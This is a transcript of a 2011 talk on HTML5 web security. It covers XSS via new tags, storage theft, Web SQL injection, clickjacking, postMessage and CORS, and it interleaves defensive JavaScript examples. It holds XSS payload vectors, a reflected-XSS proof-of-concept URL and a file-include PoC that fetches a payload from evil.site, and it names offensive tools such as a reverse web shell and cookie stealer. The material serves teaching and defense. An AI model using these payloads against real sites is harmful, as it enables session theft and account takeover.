Talk about html5 security

ourren
September 15, 2011

Transcript

  1. youstar@insight-labs

  2. Introduction to HTML5
     HTML5 threat model
     Vulnerabilities & Defense
     Tools
     Reference

  3. History
     • HTML 1.0: June 1993, never a formal standard
     • HTML 2.0: November 1995, RFC 1866
     • HTML 3.2: 14 January 1997, W3C Recommendation
     • HTML 4.0: 18 December 1997, W3C Recommendation
     • HTML 4.01: 24 December 1999, W3C Recommendation
     • XHTML 1.0: 26 January 2000, W3C Recommendation
     • HTML5: first public Working Draft in 2008
     • W3C Candidate Recommendation planned for 2012

  4. Features
     The three aspects of HTML5:
     ▪ Content: HTML, with new tags and attributes
     ▪ Presentation of content: CSS
     ▪ Interaction with content: JavaScript, with new APIs (drag and drop, localStorage, Web Workers, etc.)

  5. Features (image slide)

  6. (image slide)

  7. (image slide)

  8. • XSS abuse with the new tags and attributes
     • Hiding the payload from the URL (History API)
     • Stealing from client-side storage
     • Injecting into and exploiting Web SQL
     • Clickjacking and Cookiejacking
     • Cross-Origin Requests and postMessage
     • Client-side file includes
     • Botnets and widgets (Web Workers)

  9. In:
     • New tags (the element names were lost in this transcript)
     • New attributes for input: autocomplete, autofocus, pattern (yes, a regex)
     • New media events
     • A new tag for 2D rendering
     • New form controls for date and time
     • Geolocation
     • New selectors
     • Client-side storage: localStorage, sessionStorage and Web SQL
     Out:
     • Presentation elements and old special-effect elements (names lost in this transcript)
     • Presentation attributes such as align and border

  10. Attack:
     • New XSS vectors from the new tags and attributes
     • Bypass of black-list filters that only know the old vectors
     Defense:
     • Add the new tags and event attributes to the black list
     • Update the filter regex
     (A black list always lags behind the next new element or event; encoding output for its context, or an allow-list of tags, holds up better.)
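As an added example, not code from the slides: a black-list XSS filter of the kind slide 10 describes, and the HTML5-era vectors that pass through it unchanged. The filter is a constructed stand-in for a pre-HTML5 one; the vectors are the widely published autofocus/onfocus, media onerror, details/ontoggle and entity-encoded javascript: payloads (the html5sec cheat sheet cited on slide 46 collects many more). The last function shows the alternative to extending the list: encode for the HTML text context so every vector becomes inert text.

```javascript
// Added example (not from the slides): a black-list XSS filter of the kind
// slide 10 describes, and the HTML5-era vectors that pass through it unchanged.
// The filter is a constructed stand-in for a pre-HTML5 one.

// A pre-HTML5 black list: strips <script> blocks, javascript: URLs and the
// event handlers its author knew about.
const BLACKLIST = [
  /<\s*script[^>]*>[\s\S]*?<\s*\/\s*script\s*>/gi,
  /javascript\s*:/gi,
  /\son(load|click|mouseover|mouseout|submit)\s*=/gi,
];

function blacklistFilter(html) {
  return BLACKLIST.reduce((out, re) => out.replace(re, ''), html);
}

// Payloads that contain none of the black-listed tokens but still run script.
const HTML5_VECTORS = [
  '<input autofocus onfocus=alert(1)>',                              // new autofocus attribute + onfocus
  '<video src=x onerror=alert(1)>',                                  // new media element
  '<details open ontoggle=alert(1)>',                                // new element and event
  '<form><button formaction=javascript&colon;alert(1)>go</button>', // entity hides the colon from the regex
];

// Does the filtered output still contain a tag carrying an event handler or a
// javascript: URL? A text-level approximation of "still executes".
function stillExecutes(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html) ||
         /<[a-z][^>]*javascript(&colon;|:)/i.test(html);
}

// Context-aware encoding instead of token hunting: every vector becomes text.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' })[c]);
}

// Which of the HTML5 vectors survive the black list intact.
function bypassingVectors() {
  return HTML5_VECTORS.filter(v => stillExecutes(blacklistFilter(v)));
}
```

The classic vectors (`<img onload=...>`, `href="javascript:..."`) are caught, all four HTML5 vectors survive, and `escapeHtml` neutralises all of them without knowing any of them.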

  11. (image slide)

  12. DOM
     • window.history.back();
     • window.history.forward();
     • window.history.go();
     HTML5
     • history.pushState()
     ▪ history.pushState(stateObject, title, URL);
     • history.replaceState()
     ▪ Same arguments as pushState, but modifies the current history entry instead of adding a new one.

  13. PoC: reflected XSS whose payload rewrites the address bar
     http://127.0.0.1/html5/poc/history/xsspoc.php?xss=<script>history.pushState({},'',location.href.split("?").shift());document.write(1)</script>
     After the script runs, the address bar and the history entry show only:
     http://127.0.0.1/html5/poc/history/xsspoc.php
     pushState() may set any same-origin URL, so the query string that carried the payload disappears from the location bar.

  14. (image slide)

  15. Type
     • localStorage: long-term storage, persists until cleared
     • sessionStorage: per-tab session storage, discarded when the tab or browser is closed
     Differences
     • Cookies: about 4 KB per cookie
     • localStorage / sessionStorage: browser-dependent, usually 5 MB per origin
     Support
     • Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50

  16. (image slide)

  17. Functions
     • (localStorage | sessionStorage).setItem(key, value)
     • (localStorage | sessionStorage).getItem(key)
     • (localStorage | sessionStorage).removeItem(key)
     • (localStorage | sessionStorage).clear()

  18. Attack
     • Read data out of storage (session identifiers, passwords, etc.) from any injected script
     • Store an XSS payload in storage so it persists after the original injection point is fixed
     • No path restriction: unlike a cookie, a key is readable from every page on the origin
     Defense
     • Don't store sensitive data in local storage
     • Don't use local storage for session identifiers
     • Stick with cookies and set the HttpOnly and Secure flags
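As an added example, not code from the slides or from the HTML5CSdump tool named later: what an injected script can pull out of Web Storage on an origin, and how to triage the dump for the two things slide 18 warns about, stored credentials and stored payloads. Node has no Web Storage, so a minimal stand-in with the same length/key/getItem interface is constructed here; in a browser, pass window.localStorage or window.sessionStorage to dumpStorage directly. The sample entries are constructed.

```javascript
// Added example (not from the slides). Node has no Web Storage, so this
// stand-in exposes the same length/key/getItem interface as the real object.
function makeStorage(entries) {
  const m = new Map(Object.entries(entries));
  return {
    get length() { return m.size; },
    key: (i) => Array.from(m.keys())[i] ?? null,
    getItem: (k) => (m.has(k) ? m.get(k) : null),
  };
}

// Enumerate every key on the origin. There is no path scoping and no
// HttpOnly equivalent, so any script running on the origin sees all of it.
function dumpStorage(storage) {
  const out = {};
  for (let i = 0; i < storage.length; i++) {
    const k = storage.key(i);
    out[k] = storage.getItem(k);
  }
  return out;
}

// Keys or values that look like session or credential material.
const SENSITIVE_KEY = /(sess|token|auth|passw|secret|jwt|api[_-]?key)/i;
const JWT_VALUE = /^eyJ[\w-]+\.[\w-]+\.[\w-]+$/;   // base64url header.payload.signature
function findSensitive(dump) {
  return Object.entries(dump)
    .filter(([k, v]) => SENSITIVE_KEY.test(k) || JWT_VALUE.test(String(v)))
    .map(([k]) => k);
}

// Values that look like a stored XSS payload: markup with a handler, a script
// tag, or code the page will later eval() or document.write().
const PAYLOAD_VALUE = /<script|<\w+[^>]*\son\w+\s*=|\beval\s*\(|document\.write/i;
function findStoredPayloads(dump) {
  return Object.entries(dump)
    .filter(([, v]) => PAYLOAD_VALUE.test(String(v)))
    .map(([k]) => k);
}

// Constructed sample standing in for one origin's localStorage.
const sampleLocal = makeStorage({
  theme: 'dark',
  auth_token: 'deadbeefcafef00d',
  cart: JSON.stringify([{ sku: 'A1', qty: 2 }]),
  id_token: 'eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjMifQ.abc',
  cached_widget: '<img src=x onerror="eval(localStorage.getItem(\'p\'))">',
});
```

On the sample, `findSensitive` reports `auth_token` and `id_token`, and `findStoredPayloads` reports `cached_widget`, the pattern a page falls into when it caches markup or code in storage and reinserts it with innerHTML or eval.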

  19. (image slide)

  20. Database Storage (Web SQL)
     • Modelled on the Google Gears database API
     Operate
     • db = openDatabase("Database Name", "Database Version", "Database Description", estimatedSizeInBytes);
     • db.transaction(function (tx) { tx.executeSql("YOUR SQL STATEMENT HERE", [params], onSuccess, onError); });
     Type
     • SQLite (supported by WebKit browsers)

  21. Attack
     • Store an XSS payload in the database
     • SQL injection into client-side queries
     Defense
     • Use parameterised statements (? placeholders) instead of string-building SQL
     • Encode query results before displaying them
     • Don't store sensitive data

  22. Store shellcode (image slide)

  23. SQL Injection
     Enumerate the schema through sqlite_master
     ▪ SELECT name FROM sqlite_master WHERE type='table'
     ▪ SELECT sql FROM sqlite_master WHERE name='table_name'
     ▪ SELECT sqlite_version()
     Select with ? placeholders
     ▪ executeSql("SELECT name FROM stud WHERE id=" + input_id);   vulnerable: input_id is spliced into the SQL text
     ▪ executeSql("SELECT name FROM stud WHERE id=?", [input_id]);  safe: input_id is bound as a value
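As an added example, not code from the slides: a static check for the defect slide 23 shows, run over constructed snippets of Web SQL client code. It locates each executeSql() call, extracts the SQL argument, and reports whether it is a single literal (bind values belong in the array argument), a string concatenation or template literal (injectable), or a variable built elsewhere (needs manual review). The sample source and its identifiers are constructed for the example.

```javascript
// Added example (not from the slides): audit executeSql() calls for SQL
// built from untrusted input. Sample source below is constructed.

// Extract the first argument of a call, starting just after the "(".
// Tracks quotes and nesting so commas inside strings or arrays do not end it.
function firstArgument(src, start) {
  let depth = 0, quote = null, i = start;
  for (; i < src.length; i++) {
    const c = src[i];
    if (quote) {
      if (c === '\\') { i++; continue; }   // skip escaped character
      if (c === quote) quote = null;
    } else if (c === '"' || c === "'" || c === '`') {
      quote = c;
    } else if (c === '(' || c === '[' || c === '{') {
      depth++;
    } else if (c === ')' || c === ']' || c === '}') {
      if (depth === 0) break;
      depth--;
    } else if (c === ',' && depth === 0) {
      break;
    }
  }
  return src.slice(start, i).trim();
}

const STRING_LITERAL = /(['"`])(?:\\.|(?!\1)[^\\])*\1/g;

function classifySql(arg) {
  if (/^`[\s\S]*\$\{/.test(arg)) return 'template-literal'; // `... ${x} ...`
  const stripped = arg.replace(STRING_LITERAL, 'S');          // quoted text -> S
  if (stripped === 'S') return 'ok';                          // one literal, placeholders only
  if (/\+/.test(stripped)) return 'concatenation';             // "..." + x
  return 'non-literal';                                       // a variable: review where it is built
}

function auditExecuteSql(src) {
  const findings = [];
  const call = /\.executeSql\s*\(/g;
  let m;
  while ((m = call.exec(src)) !== null) {
    const sql = firstArgument(src, m.index + m[0].length);
    const line = src.slice(0, m.index).split('\n').length;
    findings.push({ line, sql, verdict: classifySql(sql) });
  }
  return findings;
}

// Constructed sample: the two calls from slide 23 plus two more patterns.
const SAMPLE_SOURCE = [
  'db.transaction(function (tx) {',
  '  tx.executeSql("SELECT name FROM stud WHERE id=" + input_id, [], show);',
  '  tx.executeSql("SELECT name FROM stud WHERE id=?", [input_id], show);',
  "  tx.executeSql(`DELETE FROM stud WHERE name='${name}'`);",
  '  tx.executeSql(query, params);',
  '});',
].join('\n');
```

Run `auditExecuteSql(SAMPLE_SOURCE)` and the slide's first call comes back as `concatenation` on line 2, the second as `ok`, the template literal as `template-literal`, and the variable as `non-literal`. A `+` inside the literal itself (`"SELECT 1+1"`) is still `ok`, since only quoted text is removed before the check.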

  24. Drag and drop basics
     Drag data, the drag feedback image, drag effects
     Drag events:
     • dragstart
     • dragenter
     • dragover
     • dragleave
     • drag
     • drop
     • dragend

  25. (image slide)

  26. ClickJacking
     • XSS + drag and drop: the user is tricked into dragging content across a frame boundary

  27. (image slide)

  28. CookieJacking
     • Combines several techniques to steal the user's locally stored cookies
     Technique
     • How to read the local file: an iframe pointing at a file:// URL
     • How to detect the state of the cookies: clickjacking
     • How to send the cookies: SMB

  29. (image slide)

  30. Defense
     • Use iframe with the sandbox attribute when embedding third-party content
     • Frame busting in the page that must not be framed:
     if (top !== window) top.location = window.location.href;
     if (top != self) top.location.href = self.location.href;
     (An attacker can also put the sandbox attribute on the frame that holds the victim page, which disables its scripts and with them this frame-busting code; a server-side X-Frame-Options header does not depend on script running.)

  31. postMessage
     Send
     ▪ otherWindow.postMessage(message, targetOrigin);
     Receive
     window.addEventListener("message", receiveMessage, false);
     function receiveMessage(event) {
       if (event.origin !== "http://example.org:8080")
         return;
       // ...
     }

  32. (image slide)

  33. Defense
     • Check event.origin on every received message
     • Don't use innerHTML
     ▪ element.innerHTML = e.data;    // dangerous: the message is parsed as HTML
     ▪ element.textContent = e.data;  // safe: the message is treated as text
     • Don't eval() the message
     • When sending, pass an explicit targetOrigin rather than "*"
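As an added example, not code from the slides: the receiver from slides 31 and 33 as a testable handler, with the matching sender. Beyond the slide, the origin is checked against an allow-list by exact string match, the payload is parsed as JSON and validated by type, and the result is written with textContent. The origins are hypothetical; the event objects and window stand-ins are constructed because Node has no window (in a browser, attach handleMessage with window.addEventListener('message', ...)).

```javascript
// Added example (not from the slides). Origins are hypothetical; event and
// window objects used with these functions are constructed in the test.
const TRUSTED_ORIGINS = new Set(['https://app.example.org', 'https://widgets.example.org']);

// sink stands in for the element the page updates (any object with textContent).
function handleMessage(event, sink) {
  // 1. Exact origin match. Not startsWith/endsWith/indexOf: those accept
  //    https://app.example.org.evil.net or https://evil.net/app.example.org.
  if (!TRUSTED_ORIGINS.has(event.origin)) return { accepted: false, reason: 'untrusted origin' };

  // 2. Treat the data as data: JSON.parse, never eval, and never innerHTML.
  let msg;
  try {
    msg = typeof event.data === 'string' ? JSON.parse(event.data) : event.data;
  } catch {
    return { accepted: false, reason: 'not JSON' };
  }
  if (!msg || typeof msg !== 'object' || msg.type !== 'status') {
    return { accepted: false, reason: 'unknown message type' };
  }

  // 3. Copy only the field we expect, as text; markup inside it stays inert.
  const text = String(msg.text ?? '').slice(0, 200);
  sink.textContent = text;
  return { accepted: true, text };
}

// Sender side: always name the target origin, never "*", so the message
// cannot be read by whatever page happens to be loaded in that window.
function sendStatus(targetWindow, text, targetOrigin = 'https://app.example.org') {
  targetWindow.postMessage(JSON.stringify({ type: 'status', text }), targetOrigin);
}
```

A message from an unlisted origin, a suffix-spoofed origin, or raw markup in place of JSON is rejected before anything touches the page; a valid message renders `<b>hi</b>` as literal text.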

  34. Cross-Origin Resource Sharing
     ▪ Originally, Ajax calls were subject to the Same-Origin Policy
     ▪ Site A cannot make XMLHttpRequests to Site B
     ▪ HTML5 (CORS) makes these cross-domain calls possible
     ▪ Site A → Site B: the response must include a header
     ▪ Access-Control-Allow-Origin: Site A   (required)
     ▪ Access-Control-Allow-Credentials: true | false
     ▪ Access-Control-Expose-Headers:
     ▪ etc.

  35. (image slide)

  36. (image slide)

  37. Defense
     • Don't set Access-Control-Allow-Origin: *
     ▪ (the same mistake as an open Flash crossdomain.xml)
     • Prevent DDoS: only process requests from allowed origins
     ▪ if (origin == "Site A") { header("Access-Control-Allow-Origin: Site A"); ... // process request }
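As an added example, not code from the slides: the origin check sketched on slide 37, as a function that computes the CORS response headers for one request. The origin names are hypothetical. Beyond the slide it shows three details a reflecting implementation tends to get wrong: exact match against an allow-list (a substring check lets site-a.example.evil.net through), never allowing the "null" origin, and emitting Vary: Origin so a shared cache does not hand one origin's headers to another.

```javascript
// Added example (not from the slides). Origin names are hypothetical.
const ALLOWED_ORIGINS = new Set(['https://site-a.example', 'https://admin.site-a.example']);

// Compute the CORS headers for a request carrying the given Origin value.
function corsHeaders(requestOrigin, { allowCredentials = true } = {}) {
  const headers = { Vary: 'Origin' };                         // cache keyed on Origin
  if (!requestOrigin) return headers;                         // no Origin header: not a CORS request
  if (requestOrigin === 'null') return headers;               // sandboxed iframe, file:// or data: page: never allow
  if (!ALLOWED_ORIGINS.has(requestOrigin)) return headers;    // unknown origin: emit no ACAO at all
  headers['Access-Control-Allow-Origin'] = requestOrigin;     // echo the exact allowed value, not "*"
  if (allowCredentials) headers['Access-Control-Allow-Credentials'] = 'true';
  return headers;
}

// What the slide's pseudocode often turns into in practice: a substring test
// on the Origin value. It accepts attacker-registered hosts.
function naiveOriginAllowed(requestOrigin) {
  return String(requestOrigin).indexOf('site-a.example') !== -1;
}
```

Browsers refuse `Access-Control-Allow-Origin: *` together with `Access-Control-Allow-Credentials: true`, but a server that echoes any Origin value back gets the same effect; the allow-list is what makes the echo safe.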

  38. Code like this:
     x = new XMLHttpRequest();
     x.open("GET", location.hash.substring(1));
     x.onreadystatechange = function () {
       if (x.readyState == 4) {
         document.getElementById("main").innerHTML = x.responseText;
       }
     };
     x.send();

     PoC
     Introducing cross-origin requests: http://example.com/#http://evil.site/payload.php
     The contents of 'payload.php' are fetched and included as HTML in the page's #main element.
     A new type of XSS: the client-side file include.
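As an added example, not code from the slides: the check that slide 38's code lacks, applied to location.hash before it reaches XMLHttpRequest. Only a single file under one same-origin directory is accepted; absolute URLs, protocol-relative URLs, javascript: URLs and ../ traversal are rejected. The page origin and the /partials/ directory are assumptions for the example, and the sample fragments are constructed.

```javascript
// Added example (not from the slides). PAGE_ORIGIN and ALLOWED_DIR are
// assumptions for the example.
const PAGE_ORIGIN = 'https://example.com';
const ALLOWED_DIR = '/partials/';

// Returns the same-origin path to fetch, or null if the fragment is not acceptable.
function resolveFragment(hash) {
  const fragment = hash.startsWith('#') ? hash.slice(1) : hash;
  if (fragment === '') return null;
  let url;
  try {
    url = new URL(fragment, PAGE_ORIGIN);      // resolves relative paths and normalises ../
  } catch {
    return null;
  }
  if (url.origin !== PAGE_ORIGIN) return null;             // http://evil.site/..., //evil.site/..., javascript:
  if (!url.pathname.startsWith(ALLOWED_DIR)) return null;  // /admin/..., or a ../ that left the directory
  const file = url.pathname.slice(ALLOWED_DIR.length);
  if (!/^[\w.-]+\.html$/.test(file)) return null;          // exactly one .html file, no sub-paths
  return url.pathname;
}

// Constructed fragments an attacker or a legitimate link might supply.
const SAMPLE_FRAGMENTS = [
  '#http://evil.site/payload.php',      // slide 38's PoC
  '#//evil.site/payload.php',           // protocol-relative, same effect
  '#javascript:alert(1)',
  '#/partials/../admin/users.html',     // traversal, normalised to /admin/users.html
  '#/partials/about.html',              // acceptable
  '#partials/contact.html',             // relative, acceptable
];

function acceptedFragments() {
  return SAMPLE_FRAGMENTS.map(resolveFragment).filter(p => p !== null);
}
```

Only the two /partials/ files survive. Even for those, the fetched body should be treated as data (textContent, or a template engine that escapes), not assigned to innerHTML, unless the server side of that directory is fully trusted.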

  39. (image slide)

  40. Web Workers
     • Run scripts in the background, independently of the page
     • Very simple:
     var w = new Worker("some_script.js");
     w.onmessage = function (e) { /* do something */ };
     w.terminate();
     Can access
     ▪ XHR, the navigator object, the application cache, and can spawn other workers
     Can't access
     ▪ the DOM: window and document objects

  41. Attack
     Botnet
     ▪ Application-level DDoS attacks
     ▪ Email spam
     ▪ Distributed password cracking
     Network scanning
     ▪ Port scans from the victim's browser
     Guessing the user's private IP address
     ▪ Identify the user's subnet
     ▪ Identify the IP address

  42. COR + XSS + Workers = Shell of the Future

  43. HTML5CSdump
     • Uses the enumeration and extraction techniques described above to obtain all client-side storage belonging to a given domain
     JS-Recon
     • Port scans
     • Network scans
     • Detecting the private IP address

  44. Imposter
     • Steal cookies
     • Set cookies
     • Steal Local Shared Objects
     • Steal stored passwords from Firefox
     • etc.
     Shell of the Future
     • Reverse web shell handler
     • Bypasses anti-session-hijacking measures

  45. Ravan
     • JavaScript-based distributed computing system (password cracking in Web Workers)
     Hashing algorithms
     ▪ MD5
     ▪ SHA1
     ▪ SHA256
     ▪ SHA512

  46. References
     • New security threats brought by HTML5 (HTML5 带来的新安全威胁): xisigr
     • Attacking with HTML5: lavakumark
     • Abusing HTML5: Ming Chow
     • HTML5 Web Security: Thomas Röthlisberger
     • Abusing HTML 5 Structured Client-side Storage: Alberto Trivero
     • Cookiejacking: Rosario Valotta
     • http://heideri.ch/jso/#html5
     • http://www.wooyun.org/bugs/wooyun-2011-02351
     • http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and-dom-l3-top-10-attacks.html
     • http://www.html5test.com

  47. References (continued)
     • http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe.html
     • http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox
     • http://code.google.com/intl/zh-CN/apis/gears/api_database.html
     • http://michael-coates.blogspot.com/2010/07/html5-local-storage-and-xss.html
     • http://www.w3.org/TR/access-control/
     • http://m-austin.com/blog/?p=19
     • https://developer.mozilla.org/en/
     • http://www.w3.org/TR/cors/
     • http://www.andlabs.org/tools/ravan.html
     • http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/

  48. Contact Me
     • email: [email protected]
     • Sites: www.codesec.info, www.insight-labs.org